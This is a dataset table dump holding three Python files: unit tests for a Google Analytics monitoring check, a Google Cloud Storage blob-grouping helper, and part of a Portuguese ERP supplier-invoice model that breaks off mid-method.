max_stars_repo_path stringlengths 4 286 | max_stars_repo_name stringlengths 5 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.03M | content_cleaned stringlengths 6 1.03M | language stringclasses 111 values | language_score float64 0.03 1 | comments stringlengths 0 556k | edu_score float64 0.32 5.03 | edu_int_score int64 0 5 |
|---|---|---|---|---|---|---|---|---|---|---|
google_analytics/test_google_analytics.py | StackVista/sts-agent-integrations-core | 3 | 6616751 | # stdlib
import os
# 3p
import json
from mock import Mock
# datadog
from tests.checks.common import AgentCheckTest, Fixtures
FIXTURE_DIR = os.path.join(os.path.dirname(__file__), 'ci')
class GoogleAnalytics(AgentCheckTest):
CHECK_NAME = "google_analytics"
@staticmethod
def _config(instances):
def include_profile(instance):
instance['profile'] = 'ga:12345678'
return instance
return {
'init_config': {
'key_file_location': '/dev/null'
},
'instances': map(lambda instance: include_profile(instance), instances)
}
@staticmethod
def _get_json(file_name):
return json.loads(Fixtures.read_file("%s.json" % file_name, sdk_dir=FIXTURE_DIR))
class TestRealtimeGoogleAnalytics(GoogleAnalytics):
"""
Unit tests for Real time Google Analytics AgentCheck.
"""
def test_detect_real_time_required(self):
process_realtime_mock = Mock()
process_ga_mock = Mock()
self.run_check(self._config([{
'metrics': ['rt:pageviews']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'process_realtime': process_realtime_mock,
'process_ga': process_ga_mock
})
self.assertTrue(process_realtime_mock.called, msg='Method process_realtime should not have been called.')
self.assertFalse(process_ga_mock.called, msg='Method process_ga should not have been called.')
def test_detect_non_real_time_required(self):
process_realtime_mock = Mock()
process_ga_mock = Mock()
self.run_check(self._config([{
'metrics': ['ga:pageviews']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'process_realtime': process_realtime_mock,
'process_ga': process_ga_mock
})
self.assertFalse(process_realtime_mock.called, msg='Method process_realtime should not have been called.')
self.assertTrue(process_ga_mock.called, msg='Method process_ga should not have been called.')
def test_metric(self):
self.run_check(self._config([{
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=40, tags=['profile:ga:12345678', 'rt.minutesAgo:01'], count=1)
def test_one_metric_one_dimension_minutesAgo_no_filter_no_minute(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter_no_minute_value"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertEqual(len(self.metrics), 0, "No metrics should have been collected.")
def test_one_metric_empty_results(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter_no_result"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertEqual(len(self.metrics), 0, "No metrics should have been collected.")
def test_one_metric_no_dimension_no_filter(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:activeUsers'],
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_no_dimensions_no_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.activeUsers", value=2, tags=['profile:ga:12345678'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
def test_one_metric_two_dimensions_one_filter(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo', 'rt:pagePath'],
'filters': 'rt:pagePath=~^/booker/selection.outbound'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_two_dimensions_one_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=1, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound'], count=1)
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=2, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound.connections'], count=1)
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=2, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound.connections/bookingSummaryModal'], count=1)
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=1, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound.detail'], count=1)
self.assertEqual(len(self.metrics), 4, msg='Four metrics should have been collected.')
def test_metric_instance_tags(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo'],
'tags': ['env:test', 'key:value']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=40, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'env:test', 'key:value'], count=1)
class TestGoogleAnalytics(GoogleAnalytics):
"""
Unit tests for non- real time Google Analytics AgentCheck.
"""
def test_empty_metrics(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews', 'ga:users'],
'dimensions': ['ga:pagePath', 'ga:browser'],
'filters': ['ga:pagePath==/booker_v3/confirmation', 'ga:browser==Chrome2'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_two_metrics_two_dimensions_two_filters_no_results")
})
self.assertEqual(len(self.metrics), 0, msg='No metrics should have been collected.')
def test_empty_dimensions(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_no_dimensions_no_filters")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=8119, tags=['profile:ga:12345678'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
def test_one_metric_one_dimension_one_filter(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'dimensions': ['ga:pagePath'],
'filters': 'ga:pagePath==/booker_v3/confirmation',
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_one_dimension_one_filter")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=11, tags=['profile:ga:12345678','ga.pagePath:/booker/confirmation'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
def test_one_metric_one_dimension_no_filter(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'dimensions': ['ga:pagePath'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_one_dimension_no_filter")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=29, tags=['profile:ga:12345678', 'ga.pagePath:/'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=39, tags=['profile:ga:12345678', 'ga.pagePath:/aftersales/cancel-step-1'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=15, tags=['profile:ga:12345678', 'ga.pagePath:/aftersales/cancel-step-2'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=0, tags=['profile:ga:12345678', 'ga.pagePath:/nl/tickets'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=0, tags=['profile:ga:12345678', 'ga.pagePath:/nl/tickets-v3/'], count=1)
self.assertEqual(len(self.metrics), 5, msg='Five metrics should have been collected.')
def test_two_metrics_one_dimension_one_filter(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews', 'ga:users'],
'dimensions': ['ga:pagePath'],
'filters': ['ga:pagePath==/booker_v3/confirmation'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_two_metrics_one_dimension_one_filter")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=11, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.users", value=6, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation'], count=1)
self.assertEqual(len(self.metrics), 2, msg='Two metrics should have been collected.')
def test_two_metrics_two_dimensions_two_filters(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews', 'ga:users'],
'dimensions': ['ga:pagePath', 'ga:browser'],
'filters': ['ga:pagePath==/booker_v3/confirmation', 'ga:browser==Chrome'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_two_metrics_two_dimensions_two_filters")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=11, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation', 'ga.browser:Chrome'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.users", value=6, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation', 'ga.browser:Chrome'], count=1)
self.assertEqual(len(self.metrics), 2, msg='Two metrics should have been collected.')
def test_instance_tags(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'start_time': '2daysAgo',
'end_time': '1daysAgo',
'tags': ['tag:tag1', 'key:value']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_no_dimensions_no_filters")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=8119, tags=['profile:ga:12345678','tag:tag1', 'key:value'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
| # stdlib
import os
# 3p
import json
from mock import Mock
# datadog
from tests.checks.common import AgentCheckTest, Fixtures
FIXTURE_DIR = os.path.join(os.path.dirname(__file__), 'ci')
class GoogleAnalytics(AgentCheckTest):
CHECK_NAME = "google_analytics"
@staticmethod
def _config(instances):
def include_profile(instance):
instance['profile'] = 'ga:12345678'
return instance
return {
'init_config': {
'key_file_location': '/dev/null'
},
'instances': map(lambda instance: include_profile(instance), instances)
}
@staticmethod
def _get_json(file_name):
return json.loads(Fixtures.read_file("%s.json" % file_name, sdk_dir=FIXTURE_DIR))
class TestRealtimeGoogleAnalytics(GoogleAnalytics):
"""
Unit tests for Real time Google Analytics AgentCheck.
"""
def test_detect_real_time_required(self):
process_realtime_mock = Mock()
process_ga_mock = Mock()
self.run_check(self._config([{
'metrics': ['rt:pageviews']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'process_realtime': process_realtime_mock,
'process_ga': process_ga_mock
})
self.assertTrue(process_realtime_mock.called, msg='Method process_realtime should not have been called.')
self.assertFalse(process_ga_mock.called, msg='Method process_ga should not have been called.')
def test_detect_non_real_time_required(self):
process_realtime_mock = Mock()
process_ga_mock = Mock()
self.run_check(self._config([{
'metrics': ['ga:pageviews']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'process_realtime': process_realtime_mock,
'process_ga': process_ga_mock
})
self.assertFalse(process_realtime_mock.called, msg='Method process_realtime should not have been called.')
self.assertTrue(process_ga_mock.called, msg='Method process_ga should not have been called.')
def test_metric(self):
self.run_check(self._config([{
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=40, tags=['profile:ga:12345678', 'rt.minutesAgo:01'], count=1)
def test_one_metric_one_dimension_minutesAgo_no_filter_no_minute(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter_no_minute_value"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertEqual(len(self.metrics), 0, "No metrics should have been collected.")
def test_one_metric_empty_results(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter_no_result"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertEqual(len(self.metrics), 0, "No metrics should have been collected.")
def test_one_metric_no_dimension_no_filter(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:activeUsers'],
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_no_dimensions_no_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.activeUsers", value=2, tags=['profile:ga:12345678'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
def test_one_metric_two_dimensions_one_filter(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo', 'rt:pagePath'],
'filters': 'rt:pagePath=~^/booker/selection.outbound'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_two_dimensions_one_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=1, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound'], count=1)
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=2, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound.connections'], count=1)
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=2, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound.connections/bookingSummaryModal'], count=1)
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=1, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'rt.pagePath:/booker/selection.outbound.detail'], count=1)
self.assertEqual(len(self.metrics), 4, msg='Four metrics should have been collected.')
def test_metric_instance_tags(self):
self.run_check(self._config([{
'is_realtime': True,
'metrics': ['rt:pageviews'],
'dimensions': ['rt:minutesAgo'],
'tags': ['env:test', 'key:value']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: self._get_json("realtime_one_metric_one_dimension_no_filter"),
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: None
})
self.assertMetric(metric_name="googleanalytics.rt.pageviews", value=40, tags=['profile:ga:12345678', 'rt.minutesAgo:01', 'env:test', 'key:value'], count=1)
class TestGoogleAnalytics(GoogleAnalytics):
"""
Unit tests for non- real time Google Analytics AgentCheck.
"""
def test_empty_metrics(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews', 'ga:users'],
'dimensions': ['ga:pagePath', 'ga:browser'],
'filters': ['ga:pagePath==/booker_v3/confirmation', 'ga:browser==Chrome2'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_two_metrics_two_dimensions_two_filters_no_results")
})
self.assertEqual(len(self.metrics), 0, msg='No metrics should have been collected.')
def test_empty_dimensions(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_no_dimensions_no_filters")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=8119, tags=['profile:ga:12345678'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
def test_one_metric_one_dimension_one_filter(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'dimensions': ['ga:pagePath'],
'filters': 'ga:pagePath==/booker_v3/confirmation',
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_one_dimension_one_filter")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=11, tags=['profile:ga:12345678','ga.pagePath:/booker/confirmation'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
def test_one_metric_one_dimension_no_filter(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'dimensions': ['ga:pagePath'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_one_dimension_no_filter")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=29, tags=['profile:ga:12345678', 'ga.pagePath:/'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=39, tags=['profile:ga:12345678', 'ga.pagePath:/aftersales/cancel-step-1'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=15, tags=['profile:ga:12345678', 'ga.pagePath:/aftersales/cancel-step-2'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=0, tags=['profile:ga:12345678', 'ga.pagePath:/nl/tickets'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=0, tags=['profile:ga:12345678', 'ga.pagePath:/nl/tickets-v3/'], count=1)
self.assertEqual(len(self.metrics), 5, msg='Five metrics should have been collected.')
def test_two_metrics_one_dimension_one_filter(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews', 'ga:users'],
'dimensions': ['ga:pagePath'],
'filters': ['ga:pagePath==/booker_v3/confirmation'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_two_metrics_one_dimension_one_filter")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=11, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.users", value=6, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation'], count=1)
self.assertEqual(len(self.metrics), 2, msg='Two metrics should have been collected.')
def test_two_metrics_two_dimensions_two_filters(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews', 'ga:users'],
'dimensions': ['ga:pagePath', 'ga:browser'],
'filters': ['ga:pagePath==/booker_v3/confirmation', 'ga:browser==Chrome'],
'start_time': '2daysAgo',
'end_time': '1daysAgo'
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_two_metrics_two_dimensions_two_filters")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=11, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation', 'ga.browser:Chrome'], count=1)
self.assertMetric(metric_name="googleanalytics.ga.users", value=6, tags=['profile:ga:12345678', 'ga.pagePath:/booker/confirmation', 'ga.browser:Chrome'], count=1)
self.assertEqual(len(self.metrics), 2, msg='Two metrics should have been collected.')
def test_instance_tags(self):
self.run_check(self._config([{
'is_realtime': False,
'metrics': ['ga:pageviews'],
'start_time': '2daysAgo',
'end_time': '1daysAgo',
'tags': ['tag:tag1', 'key:value']
}]), mocks={
'get_ga_service': lambda api_name, api_version, scope, key_file_location: None,
'get_rt_results': lambda profile_id, metric, dimensions, filters: None,
'get_ga_results': lambda profile_id, metrics, dimensions, filters, start_time, end_time: self._get_json("ga_one_metric_no_dimensions_no_filters")
})
self.assertMetric(metric_name="googleanalytics.ga.pageviews", value=8119, tags=['profile:ga:12345678','tag:tag1', 'key:value'], count=1)
self.assertEqual(len(self.metrics), 1, msg='One metric should have been collected.')
| en | 0.490489 | # stdlib # 3p # datadog Unit tests for Real time Google Analytics AgentCheck. Unit tests for non- real time Google Analytics AgentCheck. | 2.263457 | 2 |
blobs/blob_group.py | firepol/migrate-wordpress-to-google-cloud-python-datastore-blog | 1 | 6616752 | from dataclasses import dataclass, InitVar
from typing import Dict, List
from google.cloud.storage import Blob
from blobs.blob_file import BlobFile
from blobs.file_type import FileType, get_fallback
@dataclass
class BlobGroup:
name: str
files: Dict[FileType, BlobFile] = None
thumbnail_url: str = None
def __init__(self, name: str):
self.name = name
self.files = dict()
def get_thumbnail(self):
return get_blob_version(300, self.files)
def get_blob_version(max_size: int, blob_files: Dict[FileType, BlobFile]):
"""
Return blob of maximum size, or the original, or None if the file is not an image
"""
wished_file_type = FileType.Original
if max_size <= 150:
wished_file_type = FileType.LittleSquare
elif max_size <= 300:
wished_file_type = FileType.Thumbnail
elif max_size <= 624:
wished_file_type = FileType.Medium
elif max_size <= 1024:
wished_file_type = FileType.Large
available_file_types = [b.file_type for b in blob_files.values()]
file_type = get_fallback(wished_file_type, available_file_types)
return blob_files[file_type]
def get_dict_blob_group(blobs: List[Blob]):
"""
From a given list of blobs, get a dictionary with keys = group names, values = BlobGroups
"""
result = dict()
for b in blobs:
blob_file = BlobFile(b)
group_name = blob_file.group_name
if group_name not in result:
result[group_name] = BlobGroup(group_name)
group = result[group_name]
group.files[blob_file.file_type] = blob_file
group.thumbnail_url = group.get_thumbnail().public_url
return result
| from dataclasses import dataclass, InitVar
from typing import Dict, List
from google.cloud.storage import Blob
from blobs.blob_file import BlobFile
from blobs.file_type import FileType, get_fallback
@dataclass
class BlobGroup:
name: str
files: Dict[FileType, BlobFile] = None
thumbnail_url: str = None
def __init__(self, name: str):
self.name = name
self.files = dict()
def get_thumbnail(self):
return get_blob_version(300, self.files)
def get_blob_version(max_size: int, blob_files: Dict[FileType, BlobFile]):
"""
Return blob of maximum size, or the original, or None if the file is not an image
"""
wished_file_type = FileType.Original
if max_size <= 150:
wished_file_type = FileType.LittleSquare
elif max_size <= 300:
wished_file_type = FileType.Thumbnail
elif max_size <= 624:
wished_file_type = FileType.Medium
elif max_size <= 1024:
wished_file_type = FileType.Large
available_file_types = [b.file_type for b in blob_files.values()]
file_type = get_fallback(wished_file_type, available_file_types)
return blob_files[file_type]
def get_dict_blob_group(blobs: List[Blob]):
"""
From a given list of blobs, get a dictionary with keys = group names, values = BlobGroups
"""
result = dict()
for b in blobs:
blob_file = BlobFile(b)
group_name = blob_file.group_name
if group_name not in result:
result[group_name] = BlobGroup(group_name)
group = result[group_name]
group.files[blob_file.file_type] = blob_file
group.thumbnail_url = group.get_thumbnail().public_url
return result
| en | 0.722532 | Return blob of maximum size, or the original, or None if the file is not an image From a given list of blobs, get a dictionary with keys = group names, values = BlobGroups | 2.947975 | 3 |
core/objs/factura_forn.py | aanacleto/erp- | 0 | 6616753 | # !/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
ERP+
"""
__author__ = '<NAME>'
__credits__ = []
__version__ = "1.0"
__maintainer__ = "<NAME>"
__status__ = "Development"
__model_name__='factura_forn.FacturaFornecedor'
import auth, base_models
from orm import *
from form import *
try:
from my_terceiro import Terceiro
except:
from terceiro import Terceiro
class FacturaFornecedor(Model, View):
def __init__(self, **kargs):
Model.__init__(self, **kargs)
self.__name__ = 'factura_forn'
self.__title__= 'Facturas de Fornecedor'
self.__model_name__ = __model_name__
self.__list_edit_mode__ = 'edit'
self.__order_by__ = 'int8(factura_forn.numero) DESC'
self.__workflow__ = (
'estado', {'Rascunho':['Confirmar'], 'Confirmado':['Imprimir', 'Pagar', 'Cancelar'], 'impresso':['Cancelar'], 'cancelado':[]}
)
self.__workflow_auth__ = {
'Confirmar':['All'],
'Imprimir':['All'],
'Pagar':['Caixa'],
'Cancelar':['Gestor'],
'full_access':['Gestor']
}
self.__tabs__ = [
('Faturação', ['data','numero','serie','fornecedor','retencao','taxa_retencao','estado','residual','notas','vendedor','linha_factura_forn','total','total_desconto', 'total_iva','total_dedutivel','valor_retido']),
('Movimentos', ['movs_contab', 'movs_stock']),
('Pagamentos',['pagamentos']),
]
self.__no_edit__ = [
('estado', ['Confirmado','Pago','Impresso','Cancelado'])
]
self.__auth__ = {
'read':['All'],
'write':['All'],
'create':['All'],
'delete':['Gestor'],
'full_access':['Gestor']
}
self.__get_options__ = ['numero']
self.data = date_field(view_order=1, name ='Data', args='required ', default=datetime.date.today())
self.numero = info_field(view_order=2, name ='Número',size=30)
self.serie = string_field(view_order=3, name='Serie', size=30, args='required')
self.notas = string_field(view_order=4, name ='Notas', args='autocomplete="on"', size=200, onlist=False)
self.fornecedor = choice_field(view_order=5, name ='Fornecedor', args='required', size=100, model='terceiro', column='nome', options='model.get_fornecedores()')
self.residual = currency_field(view_order=6, name ='Valor Residual', args='readonly', size=45, sum=True)
self.estado = info_field(view_order=7, name ='Estado', size=45, default='Rascunho', options=[('rascunho','Rascunho'), ('confirmado','Confirmado'), ('cancelado','Cancelado')])
self.pagamentos = list_field(view_order=8, name ='Pagamentos', condition="documento='factura_forn' and num_doc={numero}", model_name='linha_caixa.LinhaCaixa', list_edit_mode='edit', onlist = False)
self.movs_contab = list_field(view_order=9, name ='Movimentos Contab.', condition="documento='factura_forn' and num_doc={numero}", model_name='movimento.Movimento', list_edit_mode='edit', onlist = False)
self.movs_stock = list_field(view_order=10, name ='Movimentos Stock', condition="documento='factura_forn' and num_doc={numero}", model_name='stock.Stock', list_edit_mode='edit', onlist = False)
self.linha_factura_forn = list_field(view_order=11, name ='Linhas de Factura do Fornecedor', condition="factura_forn='{id}'", model_name='linha_factura_forn.LinhaFacturaFornecedor', list_edit_mode='inline', onlist= False, search= True)
self.total = function_field(view_order=12, name ='Total', size=70, sum=True)
self.total_iva = function_field(view_order=13, name ='Total IVA', size=70)
self.total_dedutivel = function_field(view_order=14, name ='Total IVA Dedutivel', size=70)
#self.retencao=boolean_field(view_order=15,name='Efectuar Retenção?', default=False,size=90)
self.retencao = combo_field(view_order=15,name='Retenção?', default="NAO", options=[('NAO','NAO'),('SIM','SIM')], size=50)
self.taxa_retencao = percent_field(view_order=16, name ='Taxa Retenção', size=45, onlist=False)
self.valor_retido=function_field(view_order=17, name='Total Retenção', onlist=False, args='readonly',size=70)
def get_fornecedores(self):
#print('estou em get_fornecedores do factura fornecedor')
return Terceiro().get_fornecedores()
def record_lines(self, key):
